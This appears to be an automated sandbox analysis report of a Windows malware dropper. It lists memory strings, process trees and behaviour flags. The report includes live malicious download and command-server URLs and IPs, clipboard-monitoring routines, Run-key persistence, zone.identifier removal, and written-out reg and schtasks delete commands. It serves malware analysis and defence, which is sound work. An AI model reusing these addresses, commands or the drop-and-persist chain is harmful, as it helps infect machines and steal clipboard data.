Source: sysnldcvmr.exe, 00000004.00000002.1688257376.00000000006E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/1y
Source: sysnldcvmr.exe, 00000004.00000002.1688257376.00000000006E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/1~
Source: sysnldcvmr.exe, 00000004.00000002.1688593287.00000000021DB000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/2
Source: sysnldcvmr.exe, 00000004.00000002.1688257376.000000000075B000.00000004.00000020.00020000.00000000.sdmp, sysnldcvmr.exe, 00000004.00000002.1688257376.00000000006E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/2?
Source: sysnldcvmr.exe, 00000004.00000002.1688257376.00000000006E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/2C:
Source: sysnldcvmr.exe, 00000004.00000002.1688257376.0000000000733000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/2IIC:
Source: 2374323789.exe, 00000003.00000003.1479100404.0000000000708000.00000004.00000020.00020000.00000000.sdmp, 2374323789.exe, 00000003.00000002.1489419865.0000000000410000.00000002.00000001.01000000.00000006.sdmp, 2374323789.exe, 00000003.00000000.1448282216.0000000000410000.00000002.00000001.01000000.00000006.sdmp, sysnldcvmr.exe, 00000004.00000002.1688112526.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysnldcvmr.exe, 00000004.00000003.1630375617.0000000004561000.00000004.00000020.00020000.00000000.sdmp, sysnldcvmr.exe, 00000004.00000000.1479054987.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysnldcvmr.exe, 00000007.00000000.1604584854.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysnldcvmr.exe, 00000007.00000002.1635146545.0000000000410000.00000002.00000001.01000000.00000007.sdmp, 2693731851.exe, 0000000E.00000002.1683491729.0000000000410000.00000002.00000001.01000000.0000000A.sdmp, 2693731851.exe, 0000000E.00000000.1651816299.0000000000410000.00000002.00000001.01000000.0000000A.sdmp, 2374323789.exe.0.dr, sysnldcvmr.exe.3.dr, 2693731851.exe.4.dr, newtpp[1].exe.0.drString found in binary or memory: http://185.215.113.66/http://91.202.233.141/12345%s%s%s:Zone.Identifier%userprofile%%windir%%s
Source: 2374323789.exe, 00000003.00000003.1479100404.0000000000708000.00000004.00000020.00020000.00000000.sdmp, 2374323789.exe, 00000003.00000002.1489419865.0000000000410000.00000002.00000001.01000000.00000006.sdmp, 2374323789.exe, 00000003.00000000.1448282216.0000000000410000.00000002.00000001.01000000.00000006.sdmp, sysnldcvmr.exe, 00000004.00000002.1688112526.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysnldcvmr.exe, 00000004.00000003.1630375617.0000000004561000.00000004.00000020.00020000.00000000.sdmp, sysnldcvmr.exe, 00000004.00000000.1479054987.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysnldcvmr.exe, 00000007.00000000.1604584854.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysnldcvmr.exe, 00000007.00000002.1635146545.0000000000410000.00000002.00000001.01000000.00000007.sdmp, 2693731851.exe, 0000000E.00000002.1683491729.0000000000410000.00000002.00000001.01000000.0000000A.sdmp, 2693731851.exe, 0000000E.00000000.1651816299.0000000000410000.00000002.00000001.01000000.0000000A.sdmp, 2374323789.exe.0.dr, sysnldcvmr.exe.3.dr, 2693731851.exe.4.dr, newtpp[1].exe.0.drString found in binary or memory: http://91.202.233.141/
Source: sysnldcvmr.exe, 00000004.00000002.1688257376.00000000006E9000.00000004.00000020.00020000.00000000.sdmp, sysnldcvmr.exe, 00000004.00000002.1688257376.000000000069E000.00000004.00000020.00020000.00000000.sdmp, sysnldcvmr.exe, 00000004.00000002.1688560492.00000000020D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/gonup
Source: sysnldcvmr.exe, 00000004.00000002.1688257376.000000000069E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/gonup1
Source: sysnldcvmr.exe, 00000004.00000002.1690356108.00000000057AD000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/gonup8
Source: sysnldcvmr.exe, 00000004.00000002.1688257376.000000000069E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/gonupll9z
Source: newtpp[1].exe.0.drString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: newtpp[1].exe.0.drString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: LM94OE0VNK.exe, 00000000.00000002.1476552033.000000000089F000.00000004.00000020.00020000.00000000.sdmp, LM94OE0VNK.exe, 00000000.00000002.1476552033.00000000008B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://twizt.net/
Source: LM94OE0VNK.exe, 00000000.00000002.1476552033.00000000008B2000.00000004.00000020.00020000.00000000.sdmp, LM94OE0VNK.exe, 00000000.00000002.1476552033.000000000085E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://twizt.net/newtpp.exe
Source: LM94OE0VNK.exeString found in binary or memory: http://twizt.net/newtpp.exeP0
Source: LM94OE0VNK.exeString found in binary or memory: http://twizt.net/peinstall.php
Source: LM94OE0VNK.exeString found in binary or memory: http://twizt.net/peinstall.php%temp%%s
Source: LM94OE0VNK.exe, 00000000.00000002.1476552033.000000000088A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://twizt.net/peinstall.phpP
Source: LM94OE0VNK.exe, 00000000.00000002.1476552033.000000000089F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://twizt.net/peinstall.phpp
Source: LM94OE0VNK.exe, 00000000.00000002.1476552033.000000000088A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://twizt.net/peinstall.phpvPO
Source: LM94OE0VNK.exe, 00000000.00000002.1476552033.000000000089F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://twizt.net/peinstall.phpystem32
Source: C:\Users\user\AppData\Local\Temp\2374323789.exeCode function: 3_2_00405970 GetWindowLongW,SetClipboardViewer,SetWindowLongW,SetWindowLongW,SendMessageA,IsClipboardFormatAvailable,IsClipboardFormatAvailable,IsClipboardFormatAvailable,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,SendMessageA,RegisterRawInputDevices,ChangeClipboardChain,DefWindowProcA,3_2_00405970
Source: C:\Users\user\AppData\Local\Temp\2374323789.exeCode function: 3_2_00404970 lstrlenW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,lstrlenA,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,3_2_00404970
Source: C:\Windows\sysnldcvmr.exeCode function: 4_2_00404970 lstrlenW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,lstrlenA,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,4_2_00404970
Source: C:\Windows\sysnldcvmr.exeCode function: 7_2_00404970 lstrlenW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,lstrlenA,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,7_2_00404970
Source: C:\Users\user\AppData\Local\Temp\2374323789.exeCode function: 3_2_00405970 GetWindowLongW,SetClipboardViewer,SetWindowLongW,SetWindowLongW,SendMessageA,IsClipboardFormatAvailable,IsClipboardFormatAvailable,IsClipboardFormatAvailable,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,SendMessageA,RegisterRawInputDevices,ChangeClipboardChain,DefWindowProcA,3_2_00405970
Source: C:\Users\user\AppData\Local\Temp\2374323789.exeCode function: 3_2_00405970 GetWindowLongW,SetClipboardViewer,SetWindowLongW,SetWindowLongW,SendMessageA,IsClipboardFormatAvailable,IsClipboardFormatAvailable,IsClipboardFormatAvailable,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,SendMessageA,RegisterRawInputDevices,ChangeClipboardChain,DefWindowProcA,3_2_00405970
Source: C:\Users\user\AppData\Local\Temp\2374323789.exeCode function: 3_2_0040D4A0 NtQuerySystemTime,RtlTimeToSecondsSince1980,3_2_0040D4A0
Source: C:\Users\user\AppData\Local\Temp\2374323789.exeCode function: 3_2_0040F0B1 NtQueryVirtualMemory,3_2_0040F0B1
Source: C:\Windows\sysnldcvmr.exeCode function: 4_2_0040D4A0 NtQuerySystemTime,RtlTimeToSecondsSince1980,4_2_0040D4A0
Source: C:\Windows\sysnldcvmr.exeCode function: 4_2_0040F0B1 NtQueryVirtualMemory,4_2_0040F0B1
Source: C:\Users\user\AppData\Local\Temp\240016073.exeCode function: 6_2_00007FF7BFFE0685 NtQuerySystemInformation,6_2_00007FF7BFFE0685
Source: C:\Users\user\AppData\Local\Temp\240016073.exeCode function: 6_2_00007FF7BFFE0690 NtQuerySystemInformation,6_2_00007FF7BFFE0690
Source: C:\Users\user\AppData\Local\Temp\240016073.exeCode function: 6_2_00007FF7BFFE0F11 NtQuerySystemInformation,6_2_00007FF7BFFE0F11
Source: C:\Windows\sysnldcvmr.exeCode function: 7_2_0040D4A0 NtQuerySystemTime,RtlTimeToSecondsSince1980,7_2_0040D4A0
Source: C:\Windows\sysnldcvmr.exeCode function: 7_2_0040F0B1 NtQueryVirtualMemory,7_2_0040F0B1
Source: C:\Users\user\AppData\Local\Temp\2374323789.exeFile created: C:\Windows\sysnldcvmr.exeJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2374323789.exeCode function: 3_2_0040EE743_2_0040EE74
Source: C:\Users\user\AppData\Local\Temp\2374323789.exeCode function: 3_2_004040903_2_00404090
Source: C:\Users\user\AppData\Local\Temp\2374323789.exeCode function: 3_2_00407B493_2_00407B49
Source: C:\Users\user\AppData\Local\Temp\2374323789.exeCode function: 3_2_004049703_2_00404970
Source: C:\Users\user\AppData\Local\Temp\2374323789.exeCode function: 3_2_0040A5003_2_0040A500
Source: C:\Users\user\AppData\Local\Temp\2374323789.exeCode function: 3_2_00407B203_2_00407B20
Source: C:\Windows\sysnldcvmr.exeCode function: 4_2_0040EE744_2_0040EE74
Source: C:\Windows\sysnldcvmr.exeCode function: 4_2_004040904_2_00404090
Source: C:\Windows\sysnldcvmr.exeCode function: 4_2_00407B494_2_00407B49
Source: C:\Windows\sysnldcvmr.exeCode function: 4_2_004049704_2_00404970
Source: C:\Windows\sysnldcvmr.exeCode function: 4_2_0040A5004_2_0040A500
Source: C:\Windows\sysnldcvmr.exeCode function: 4_2_00407B204_2_00407B20
Source: C:\Windows\sysnldcvmr.exeCode function: 7_2_0040EE747_2_0040EE74
Source: C:\Windows\sysnldcvmr.exeCode function: 7_2_004040907_2_00404090
Source: C:\Windows\sysnldcvmr.exeCode function: 7_2_00407B497_2_00407B49
Source: C:\Windows\sysnldcvmr.exeCode function: 7_2_004049707_2_00404970
Source: C:\Windows\sysnldcvmr.exeCode function: 7_2_0040A5007_2_0040A500
Source: C:\Windows\sysnldcvmr.exeCode function: 7_2_00407B207_2_00407B20
Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\240016073.exe 5850892F67F85991B31FC90F62C8B7791AFEB3C08AE1877D857AA2B59471A2EA
Source: 240016073.exe.4.drStatic PE information: No import functions for PE file found
Source: LM94OE0VNK.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
Source: classification engineClassification label: mal100.evad.winEXE@20/10@1/7
Source: C:\Users\user\AppData\Local\Temp\2374323789.exeCode function: 3_2_00406BC0 Sleep,GetModuleFileNameW,GetVolumeInformationW,GetDiskFreeSpaceExW,_aulldiv,wsprintfW,wsprintfW,wsprintfW,Sleep,ExitThread,3_2_00406BC0
Source: C:\Users\user\AppData\Local\Temp\2374323789.exeCode function: 3_2_00406460 CoInitialize,CoCreateInstance,wsprintfW,3_2_00406460
Source: C:\Users\user\Desktop\LM94OE0VNK.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q8X2NUFH\newtpp[1].exeJump to behavior
Source: C:\Users\user\AppData\Local\Temp\240016073.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1200:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3096:120:WilError_03
Source: C:\Windows\sysnldcvmr.exeMutant created: \Sessions\1\BaseNamedObjects\753f85d83d
Source: C:\Users\user\Desktop\LM94OE0VNK.exeFile created: C:\Users\user\AppData\Local\Temp\2374323789.exeJump to behavior
Source: LM94OE0VNK.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\AppData\Local\Temp\240016073.exeSystem information queried: HandleInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\240016073.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\LM94OE0VNK.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: LM94OE0VNK.exeReversingLabs: Detection: 52%
Source: unknownProcess created: C:\Users\user\Desktop\LM94OE0VNK.exe "C:\Users\user\Desktop\LM94OE0VNK.exe"
Source: C:\Users\user\Desktop\LM94OE0VNK.exeProcess created: C:\Users\user\AppData\Local\Temp\2374323789.exe C:\Users\user\AppData\Local\Temp\2374323789.exe
Source: C:\Users\user\AppData\Local\Temp\2374323789.exeProcess created: C:\Windows\sysnldcvmr.exe C:\Windows\sysnldcvmr.exe
Source: C:\Windows\sysnldcvmr.exeProcess created: C:\Users\user\AppData\Local\Temp\240016073.exe C:\Users\user\AppData\Local\Temp\240016073.exe
Source: unknownProcess created: C:\Windows\sysnldcvmr.exe "C:\Windows\sysnldcvmr.exe"
Source: C:\Users\user\AppData\Local\Temp\240016073.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\240016073.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /delete /f /tn "Windows Upgrade Manager"
Source: C:\Windows\sysnldcvmr.exeProcess created: C:\Users\user\AppData\Local\Temp\2693731851.exe C:\Users\user\AppData\Local\Temp\2693731851.exe
Source: C:\Users\user\Desktop\LM94OE0VNK.exeProcess created: C:\Users\user\AppData\Local\Temp\2374323789.exe C:\Users\user\AppData\Local\Temp\2374323789.exeJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2374323789.exeProcess created: C:\Windows\sysnldcvmr.exe C:\Windows\sysnldcvmr.exeJump to behavior
Source: C:\Windows\sysnldcvmr.exeProcess created: C:\Users\user\AppData\Local\Temp\240016073.exe C:\Users\user\AppData\Local\Temp\240016073.exeJump to behavior
Source: C:\Windows\sysnldcvmr.exeProcess created: C:\Users\user\AppData\Local\Temp\2693731851.exe C:\Users\user\AppData\Local\Temp\2693731851.exeJump to behavior
Source: C:\Users\user\AppData\Local\Temp\240016073.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /fJump to behavior
Source: C:\Users\user\AppData\Local\Temp\240016073.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /fJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /delete /f /tn "Windows Upgrade Manager"Jump to behavior
Source: C:\Users\user\Desktop\LM94OE0VNK.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\LM94OE0VNK.exeSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\Desktop\LM94OE0VNK.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\Desktop\LM94OE0VNK.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\Desktop\LM94OE0VNK.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\Desktop\LM94OE0VNK.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\Desktop\LM94OE0VNK.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\LM94OE0VNK.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\LM94OE0VNK.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\LM94OE0VNK.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\LM94OE0VNK.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\LM94OE0VNK.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Desktop\LM94OE0VNK.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\Desktop\LM94OE0VNK.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\LM94OE0VNK.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\LM94OE0VNK.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\Desktop\LM94OE0VNK.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\LM94OE0VNK.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\Desktop\LM94OE0VNK.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2374323789.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2374323789.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2374323789.exeSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2374323789.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2374323789.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2374323789.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2374323789.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\sysnldcvmr.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\sysnldcvmr.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\sysnldcvmr.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\sysnldcvmr.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\sysnldcvmr.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\sysnldcvmr.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\sysnldcvmr.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\sysnldcvmr.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\sysnldcvmr.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\sysnldcvmr.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\sysnldcvmr.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\sysnldcvmr.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\sysnldcvmr.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\sysnldcvmr.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\sysnldcvmr.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\sysnldcvmr.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\sysnldcvmr.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\sysnldcvmr.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\sysnldcvmr.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\sysnldcvmr.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\sysnldcvmr.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\sysnldcvmr.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\sysnldcvmr.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\sysnldcvmr.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\sysnldcvmr.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\sysnldcvmr.exeSection loaded: firewallapi.dllJump to behavior
Source: C:\Windows\sysnldcvmr.exeSection loaded: fwbase.dllJump to behavior
Source: C:\Windows\sysnldcvmr.exeSection loaded: fwpolicyiomgr.dllJump to behavior
Source: C:\Windows\sysnldcvmr.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\sysnldcvmr.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\sysnldcvmr.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\240016073.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\240016073.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\240016073.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\240016073.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\240016073.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\240016073.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\240016073.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\240016073.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\240016073.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\240016073.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\240016073.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\240016073.exeSection loaded: edputil.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\240016073.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\240016073.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\240016073.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\240016073.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\240016073.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\240016073.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\240016073.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\240016073.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\240016073.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\240016073.exeSection loaded: slc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\240016073.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\240016073.exeSection loaded: sppc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\240016073.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\240016073.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\sysnldcvmr.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\sysnldcvmr.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\sysnldcvmr.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\sysnldcvmr.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\sysnldcvmr.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2693731851.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2693731851.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2693731851.exeSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2693731851.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2693731851.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2693731851.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\Desktop\LM94OE0VNK.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
Source: C:\Users\user\Desktop\LM94OE0VNK.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.9625_none_508ef7e4bcbbe589\MSVCR90.dllJump to behavior
Source: LM94OE0VNK.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: LM94OE0VNK.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: LM94OE0VNK.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: LM94OE0VNK.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: LM94OE0VNK.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: LM94OE0VNK.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Users\user\Desktop\LM94OE0VNK.exeCode function: 0_2_009C1A11 push ecx; ret 0_2_009C1A24

Persistence and Installation Behavior

barindex
Drops executables to the windows directory (C:\Windows) and starts them
Source: C:\Users\user\AppData\Local\Temp\2374323789.exeExecutable created and started: C:\Windows\sysnldcvmr.exeJump to behavior
Source: C:\Windows\sysnldcvmr.exeFile created: C:\Users\user\AppData\Local\Temp\240016073.exeJump to dropped file
Source: C:\Users\user\Desktop\LM94OE0VNK.exeFile created: C:\Users\user\AppData\Local\Temp\2374323789.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\2374323789.exeFile created: C:\Windows\sysnldcvmr.exeJump to dropped file
Source: C:\Windows\sysnldcvmr.exeFile created: C:\Users\user\AppData\Local\Temp\2693731851.exeJump to dropped file
Source: C:\Users\user\Desktop\LM94OE0VNK.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q8X2NUFH\newtpp[1].exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\2374323789.exeFile created: C:\Windows\sysnldcvmr.exeJump to dropped file

Boot Survival

barindex
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /delete /f /tn "Windows Upgrade Manager"
Source: C:\Users\user\AppData\Local\Temp\2374323789.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Windows SettingsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2374323789.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Windows SettingsJump to behavior

Hooking and other Techniques for Hiding and Protection

barindex
Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Users\user\Desktop\LM94OE0VNK.exeFile opened: C:\Users\user\AppData\Local\Temp\2374323789.exe:Zone.Identifier read attributes | deleteJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2374323789.exeFile opened: C:\Users\user\AppData\Local\Temp\2374323789.exe:Zone.Identifier read attributes | deleteJump to behavior
Source: C:\Windows\sysnldcvmr.exeFile opened: C:\Windows\sysnldcvmr.exe:Zone.Identifier read attributes | deleteJump to behavior
